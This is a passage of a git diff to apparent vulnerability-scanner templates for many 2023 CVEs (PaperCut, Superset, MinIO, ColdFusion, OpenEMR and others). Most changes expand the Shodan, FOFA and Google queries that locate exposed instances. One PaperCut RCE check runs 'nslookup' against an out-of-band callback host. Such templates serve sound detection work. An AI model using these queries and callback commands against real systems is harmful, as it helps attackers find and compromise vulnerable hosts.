http.html:"PaperCut" - fofa-query: body="papercut" + shodan-query: + - http.html:"PaperCut" + - http.html:"papercut" + - http.html:"content=\"papercut\"" + - cpe:"cpe:2.3:a:papercut:papercut_mf" + fofa-query: + - body="papercut" + - body="content=\"papercut\"" tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev variables: cmd: "nslookup {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index bf59d9c052..3f147c1e6e 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -28,7 +28,10 @@ info: max-request: 2 vendor: spip product: spip - shodan-query: html:"spip.php?page=backend" + shodan-query: + - html:"spip.php?page=backend" + - http.html:"spip.php?page=backend" + - cpe:"cpe:2.3:a:spip:spip" fofa-query: body="spip.php?page=backend" tags: cve,cve2023,packetstorm,spip,rce diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index a9759ecba1..d5e0cd9b50 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -30,7 +30,10 @@ info: max-request: 3 vendor: home-assistant product: home-assistant - shodan-query: title:"Home Assistant" + shodan-query: + - title:"Home Assistant" + - http.title:"home assistant" + - cpe:"cpe:2.3:a:home-assistant:home-assistant" fofa-query: title="home assistant" google-query: intitle:"home assistant" tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 5f08488576..b47418c1cd 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -28,8 +28,13 @@ info: max-request: 45 vendor: apache product: superset - shodan-query: html:"Apache Superset" - fofa-query: body="apache superset" + shodan-query: + - html:"Apache Superset" + - http.favicon.hash:1582430156 + - http.html:"apache superset" + fofa-query: + - body="apache superset" + - icon_hash=1582430156 tags: packetstorm,cve,cve2023,apache,superset,auth-bypass,kev http: diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index 3c31342b86..2480d5748d 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: weaver product: weaver_office_automation - fofa-query: app="泛微-EOffice" + fofa-query: + - app="泛微-EOffice" + - app="泛微-eoffice" tags: cve,cve2023,weaver,eoffice,exposure http: diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 7c973b8f15..39939fbab3 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -30,7 +30,9 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index bcf8ef4748..f651dd306b 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -29,9 +29,17 @@ info: vendor: myeventon product: eventon framework: wordpress - shodan-query: 'vuln:CVE-2023-2796' - fofa-query: "wp-content/plugins/eventon/" - publicwww-query: /wp-content/plugins/eventon/ + shodan-query: + - 'vuln:CVE-2023-2796' + - http.html:/wp-content/plugins/eventon-lite/ + - http.html:/wp-content/plugins/eventon/ + fofa-query: + - "wp-content/plugins/eventon/" + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - /wp-content/plugins/eventon/ + - /wp-content/plugins/eventon-lite/ google-query: inurl:"/wp-content/plugins/eventon/" tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 32f6ae8a7f..e95a79f3b1 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: ellucian product: ethos_identity - shodan-query: html:"Ellucian Company" + shodan-query: + - html:"Ellucian Company" + - http.html:"ellucian company" fofa-query: body="ellucian company" google-query: "login with ellucian ethos identity" tags: cve2023,cve,cas,xss,ellucian diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 7fd7b59455..26664e47c7 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -27,7 +27,10 @@ info: max-request: 16 vendor: gitlab product: gitlab - shodan-query: title:"Gitlab" + shodan-query: + - title:"Gitlab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2023,cve,gitlab,lfi,authenticated,intrusive diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 4020684296..77204f5b20 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -28,9 +28,13 @@ info: max-request: 1 vendor: apsystems product: energy_communication_unit_firmware - shodan-query: title:"Altenergy Power Control Software" + shodan-query: + - title:"Altenergy Power Control Software" + - http.title:"altenergy power control software" fofa-query: title="altenergy power control software" - google-query: intitle:"Altenergy Power Control Software" + google-query: + - intitle:"Altenergy Power Control Software" + - intitle:"altenergy power control software" tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems http: diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 3d6e1da347..6e80e2bc66 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -28,9 +28,19 @@ info: max-request: 1 vendor: minio product: minio - shodan-query: title:"Minio Console" - fofa-query: app="Minio" - google-query: intitle:"minio browser" + shodan-query: + - title:"Minio Console" + - http.title:"minio browser" + - cpe:"cpe:2.3:a:minio:minio" + - http.title:"minio console" + fofa-query: + - app="Minio" + - app="minio" + - title="minio browser" + - title="minio console" + google-query: + - intitle:"minio browser" + - intitle:"minio console" tags: cve,cve2023,minio,console,exposure,kev http: diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index a46f1b5e89..0270804031 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -30,7 +30,7 @@ info: framework: wordpress shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: "body=\"/wp-content/plugins/gift-voucher/\"" - tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher + tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 77b69e710c..275e01e0fb 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -28,8 +28,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 6e6f180d4f..a461f33987 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -28,8 +28,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev variables: diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index 4fe89549c6..0821da32d7 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -24,8 +24,12 @@ info: max-request: 2 vendor: microsoft product: sharepoint_server - shodan-query: http.headers_hash:-1968878704 - fofa-query: app="Microsoft-SharePoint" + shodan-query: + - http.headers_hash:-1968878704 + - cpe:"cpe:2.3:a:microsoft:sharepoint_server" + fofa-query: + - app="Microsoft-SharePoint" + - app="microsoft-sharepoint" tags: cve,cve2023,microsoft,sharepoint_server,kev variables: client_id: "00000003-0000-0ff1-ce00-000000000000" diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index 74721e7b72..b49346549b 100644 --- a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -23,8 +23,16 @@ info: max-request: 1 vendor: open-emr product: openemr - shodan-query: http.favicon.hash:1971268439 - fofa-query: app="OpenEMR" + shodan-query: + - http.favicon.hash:1971268439 + - http.html:"openemr" + - http.title:"openemr" + fofa-query: + - app="OpenEMR" + - body="openemr" + - title="openemr" + - app="openemr" + - icon_hash=1971268439 google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index 2e81f35956..9be93486ee 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -21,17 +21,25 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29489 cwe-id: CWE-79 - epss-score: 0.00302 - epss-percentile: 0.69029 + epss-score: 0.00354 + epss-percentile: 0.71955 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: cpanel product: cpanel - shodan-query: title:"cPanel" - fofa-query: title="cpanel - api codes" - google-query: intitle:"cpanel - api codes" + shodan-query: + - "title:\"cPanel\"" + - http.title:"cpanel" + - cpe:"cpe:2.3:a:cpanel:cpanel" + - http.title:"cpanel - api codes" + fofa-query: + - "title=\"cpanel - api codes\"" + - title="cpanel" + google-query: + - "intitle:\"cpanel - api codes\"" + - intitle:"cpanel" tags: cve,cve2023,cpanel,xss http: diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index e52254663d..feb36ac837 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -21,8 +21,16 @@ info: max-request: 1 vendor: open-emr product: openemr - shodan-query: http.favicon.hash:1971268439 - fofa-query: app="OpenEMR" + shodan-query: + - http.favicon.hash:1971268439 + - http.html:"openemr" + - http.title:"openemr" + fofa-query: + - app="OpenEMR" + - body="openemr" + - title="openemr" + - app="openemr" + - icon_hash=1971268439 google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index 191862087f..56a2e6cb1e 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -27,7 +27,7 @@ info: vendor: ejs product: ejs framework: node.js - tags: cve,cve2023,ssti,rce,ejs,oast + tags: cve,cve2023,ssti,rce,ejs,oast,node.js http: - method: GET diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index c6f2618ba2..eb78bf2d4e 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: contec product: solarview_compact - shodan-query: http.html:"SolarView Compact" + shodan-query: + - http.html:"SolarView Compact" + - cpe:"cpe:2.3:h:contec:solarview_compact" tags: cve,cve2023,lfi,solarview,edb,contec http: diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index 67ff1e908b..1c98a43ed6 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: powerjob product: powerjob - shodan-query: html:"PowerJob" - fofa-query: app="PowerJob" + shodan-query: + - html:"PowerJob" + - http.html:"powerjob" + fofa-query: + - app="PowerJob" + - app="powerjob" + - body="powerjob" tags: cve,cve2023,auth-bypass,powerjob variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index 24a9d83dcb..c38309c6a9 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -30,7 +30,10 @@ info: vendor: powerjob product: powerjob shodan-query: http.html:"powerjob" - fofa-query: app="PowerJob" + fofa-query: + - app="PowerJob" + - app="powerjob" + - body="powerjob" tags: cve2023,cve,powerjob,unauth http: diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 870bfd5717..ff89efb7d1 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: evilmartians product: imgproxy - shodan-query: "Server: imgproxy" + shodan-query: + - "Server: imgproxy" + - "server: imgproxy" tags: cve,cve2023,imgproxy,ssrf,oast,evilmartians http: diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 0abb5d4f6c..816822ceed 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -29,7 +29,9 @@ info: vendor: leotheme product: leocustomajax framework: prestashop - shodan-query: http.component:"Prestashop" + shodan-query: + - http.component:"Prestashop" + - http.component:"prestashop" tags: cve2023,cve,prestashop,sqli,leotheme http: diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index dd6a3dacd1..c9d911f06a 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -26,9 +26,18 @@ info: max-request: 4 vendor: cacti product: cacti - shodan-query: title:"Cacti" - fofa-query: icon_hash="-1797138069" - google-query: intitle:"cacti" + shodan-query: + - title:"Cacti" + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve,cve2023,cacti,authenticated http: diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index d7a59891b9..24c1284829 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -27,7 +27,9 @@ info: product: mstore_api framework: wordpress publicwww-query: "/wp-content/plugins/mstore-api/" - tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli + shodan-query: http.html:/wp-content/plugins/mstore-api/ + fofa-query: body=/wp-content/plugins/mstore-api/ + tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 8aa13ee98e..fcde066731 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -26,7 +26,10 @@ info: max-request: 4 vendor: moodle product: moodle - shodan-query: title:"Moodle" + shodan-query: + - title:"Moodle" + - cpe:"cpe:2.3:a:moodle:moodle" + - http.title:"moodle" fofa-query: title="moodle" google-query: intitle:"moodle" tags: cve,cve2023,moodle,xss,rce,authenticated diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index cecedd05b2..e94820fbf6 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -26,8 +26,12 @@ info: max-request: 1 vendor: repetier-server product: repetier-server - shodan-query: title:"Repetier-Server" - fofa-query: title="Repetier-Server" + shodan-query: + - title:"Repetier-Server" + - http.title:"repetier-server" + fofa-query: + - title="Repetier-Server" + - title="repetier-server" google-query: intitle:"repetier-server" tags: cve2023,cve,repetier,lfi,repetier-server diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index 334dc611e5..a8d6cb6e23 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -24,9 +24,11 @@ info: max-request: 1 vendor: cassianetworks product: xc1000_firmware - shodan-query: html:"Cassia Bluetooth Gateway Management Platform" + shodan-query: + - html:"Cassia Bluetooth Gateway Management Platform" + - http.html:"cassia bluetooth gateway management platform" fofa-query: body="cassia bluetooth gateway management platform" - tags: cve,cve2023,rce,cassia,gateway + tags: cve,cve2023,rce,cassia,gateway,cassianetworks http: - raw: diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index b79fc1eb82..abd37ce460 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -19,9 +19,11 @@ info: max-request: 1 vendor: gravitl product: netmaker - shodan-query: html:"netmaker" + shodan-query: + - html:"netmaker" + - http.html:"netmaker" fofa-query: body="netmaker" - tags: cve,cve2023,info-key,netmaker,exposure + tags: cve,cve2023,info-key,netmaker,exposure,gravitl http: - method: GET diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index a8fc161f17..f52cf4c9b6 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -28,9 +28,16 @@ info: vendor: myeventon product: eventon framework: wordpress - shodan-query: http.html:/wp-content/plugins/eventon/ - fofa-query: wp-content/plugins/eventon/ - publicwww-query: "/wp-content/plugins/eventon-lite/" + shodan-query: + - http.html:/wp-content/plugins/eventon/ + - http.html:/wp-content/plugins/eventon-lite/ + fofa-query: + - wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - "/wp-content/plugins/eventon-lite/" + - /wp-content/plugins/eventon/ google-query: inurl:"/wp-content/plugins/eventon/" tags: cve,cve2023,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 2ce3b43853..0ea1ccec7b 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -28,7 +28,9 @@ info: vendor: ghost product: ghost framework: node.js - shodan-query: http.component:"Ghost" + shodan-query: + - http.component:"Ghost" + - http.component:"ghost" tags: cve2023,cve,lfi,ghostcms,ghost,node.js http: diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 30e6b9c68f..ab68aac4e5 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -29,9 +29,16 @@ info: max-request: 1 vendor: igniterealtime product: openfire - shodan-query: title:"openfire" - fofa-query: title="openfire" - google-query: intitle:"openfire" + shodan-query: + - title:"openfire" + - http.title:"openfire" + - http.title:"openfire admin console" + fofa-query: + - title="openfire" + - title="openfire admin console" + google-query: + - intitle:"openfire" + - intitle:"openfire admin console" tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime http: diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index ac6e498000..3b8946f312 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -24,7 +24,9 @@ info: max-request: 2 vendor: h3c product: magic_r300-2100m_firmware - fofa-query: app="H3C-Ent-Router" + fofa-query: + - app="H3C-Ent-Router" + - app="h3c-ent-router" tags: cve2023,cve,router,rce,h3c variables: filename: "{{to_lower(rand_text_alpha(7))}}" diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index 3b3d43d113..77fe2d1c07 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: chamilo product: chamilo - shodan-query: http.component:"Chamilo" + shodan-query: + - http.component:"Chamilo" + - http.component:"chamilo" + - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve2023,cve,chamilo,unauth,cmd,rce http: diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 9acfeb4e3a..dc4149375c 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -24,7 +24,9 @@ info: max-request: 2 vendor: frangoteam product: fuxa - fofa-query: title="FUXA" + fofa-query: + - title="FUXA" + - title="fuxa" tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index ee63c31ebe..a10061d300 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -28,8 +28,14 @@ info: max-request: 2 vendor: zimbra product: collaboration - shodan-query: http.favicon.hash:475145467 - fofa-query: icon_hash="475145467" + shodan-query: + - http.favicon.hash:475145467 + - http.favicon.hash:"1624375939" + - http.favicon.hash:"475145467" + fofa-query: + - icon_hash="475145467" + - icon_hash="1624375939" + - app="zimbra-邮件系统" tags: cve,cve2023,zimbra,xss,authenticated http: diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 7bf13dbae1..3537e12045 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -28,8 +28,12 @@ info: max-request: 2 vendor: digitaldruid product: hoteldruid - shodan-query: http.title:"hoteldruid" - fofa-query: title="hoteldruid" + shodan-query: + - http.title:"hoteldruid" + - http.favicon.hash:-1521640213 + fofa-query: + - title="hoteldruid" + - icon_hash=-1521640213 google-query: intitle:"hoteldruid" tags: cve2023,cve,hoteldrui,xss,authenticated,digitaldruid diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 612b542d3e..14cf10c76f 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: gibbonedu product: gibbon - shodan-query: http.favicon.hash:-165631681 + shodan-query: + - http.favicon.hash:-165631681 + - http.favicon.hash:"-165631681" fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,lfi,gibbonedu diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index f69511db73..be7ab029a6 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: gibbonedu product: gibbon - shodan-query: http.favicon.hash:-165631681 + shodan-query: + - http.favicon.hash:-165631681 + - http.favicon.hash:"-165631681" fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,xss,authenticated,intrusive,gibbonedu diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 052e9a6997..e758b81ded 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve2023,cve,sqli,bloofox,authenticated http: diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 6a30bbff88..00bf05ef97 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -25,7 +25,9 @@ info: max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index ddcf01b94c..87d9aa7d64 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index 0afac821d8..439a14a16c 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index ad157cacb0..506327665e 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index facebf75bc..c23a6baed8 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: hestiacp product: control_panel - shodan-query: http.favicon.hash:-476299640 - fofa-query: title="hestia control panel" + shodan-query: + - http.favicon.hash:-476299640 + - http.title:"hestia control panel" + fofa-query: + - title="hestia control panel" + - icon_hash=-476299640 google-query: intitle:"hestia control panel" tags: cve2023,cve,huntr,hestiacp,xss,intrusive diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index ad5547cf04..ebe0371f12 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: traggo product: traggo - shodan-query: html:"traggo" + shodan-query: + - html:"traggo" + - http.html:"traggo" fofa-query: body="traggo" tags: cve2023,cve,traggo,lfi,server diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 931c9a0825..f0520bc1e2 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -29,7 +29,10 @@ info: max-request: 1 vendor: chamilo product: chamilo - shodan-query: http.component:"Chamilo" + shodan-query: + - http.component:"Chamilo" + - http.component:"chamilo" + - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index 946d4d2e02..81c4b9be4c 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: fortinet product: fortiwlm - shodan-query: http.title:"FortiWLM" - fofa-query: body="fortiwlm" + shodan-query: + - http.title:"FortiWLM" + - http.html:"fortiwlm" + - http.title:"fortiwlm" + fofa-query: + - body="fortiwlm" + - title="fortiwlm" google-query: intitle:"fortiwlm" tags: cve,cve2023,fortinet,fortiwlm,rce,unauth variables: diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 43ab14d11a..3b6d003cc9 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: ivanti product: endpoint_manager_mobile - shodan-query: http.favicon.hash:362091310 + shodan-query: + - http.favicon.hash:362091310 + - http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" tags: cve,cve2023,kev,ivanti,mobileiron,epmm diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 6b6b844a10..fb9b0090bc 100644 --- 